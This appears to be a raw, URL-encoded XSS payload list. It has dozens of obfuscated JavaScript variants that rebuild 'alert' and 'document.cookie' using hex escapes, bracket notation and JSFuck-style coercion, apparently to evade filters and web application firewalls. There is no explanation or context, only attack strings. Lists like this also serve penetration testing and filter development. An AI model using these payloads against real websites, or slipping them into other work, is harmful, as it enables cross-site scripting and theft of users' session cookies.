window["alert"]("ISR")
window["ale"%2b(!![]%2b[])[-~[]]%2b(!![]%2b[])[%2b[]]]()
window["ale"%2b"\x72\x74"]()
window["\x61\x6c\x65\x72\x74"]()
window['ale'%2b(!![]%2b[])[-~[]]%2b(!![]%2b[])[%2b[]]]()
window['ale'%2b'\x72\x74']()
window['\x61\x6c\x65\x72\x74']()
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
this["alert"]("ISR")
this["ale"%2b(!![]%2b[])[-~[]]%2b(!![]%2b[])[%2b[]]]()
this["ale"%2b"\x72\x74"]()
this["\x61\x6c\x65\x72\x74"]()
this['ale'%2b(!![]%2b[])[-~[]]%2b(!![]%2b[])[%2b[]]]()
this['ale'%2b'\x72\x74']()
this['\x61\x6c\x65\x72\x74']()
this[(%2b{}%2b[])[-~[]]%2b(![]%2b[])[-~-~[]]%2b([][%2b[]]%2b[])[-~-~-~[]]%2b(!![]%2b[])[-~[]]%2b(!![]%2b[])[%2b[]]]((-~[]%2b[]))
this[(%2b{}%2b[])[%2b!![]]%2b(![]%2b[])[!%2b[]%2b!![]]%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b(!![]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]
this["document"]["cookie"]
this["document"]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["cookie"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]
this["document"][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"kie"]
this["document"][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"\x6b\x69\x65"]
this["docum"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"\x6b\x69\x65"]
this["docum"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"kie"]
this["docum"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]["\x63\x6f\x6f\x6b\x69\x65"]
this["docum"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]["cookie"]
this["\x64\x6f\x63\x75\x6d"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"kie"]
this["\x64\x6f\x63\x75\x6d"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d"%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]["cookie"]
this['document']['cookie']
this['document']['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x63\x6f\x6f\x6b\x69\x65']
this['document'][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'kie']
this['document'][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'\x6b\x69\x65']
this['docum'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'\x6b\x69\x65']
this['docum'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'kie']
this['docum'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]['\x63\x6f\x6f\x6b\x69\x65']
this['docum'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]['cookie']
this['\x64\x6f\x63\x75\x6d'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]][({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'kie']
this['\x64\x6f\x63\x75\x6d'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d'%2b([][%2b[]]%2b[])[!%2b[]%2b!![]%2b!![]]%2b([][%2b[]]%2b[])[%2b!![]]%2b(!![]%2b[])[%2b[]]]['cookie']
document["cookie"]
document["\x63\x6f\x6f\x6b\x69\x65"]
document[({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"kie"]
document[({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b"\x6b\x69\x65"]
document['cookie']
document['\x63\x6f\x6f\x6b\x69\x65']
document[({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'kie']
document[({}%2b[])[!%2b[]%2b!![]%2b!![]%2b!![]%2b!![]]%2b({}%2b[])[%2b!![]]%2b({}%2b[])[%2b!![]]%2b'\x6b\x69\x65']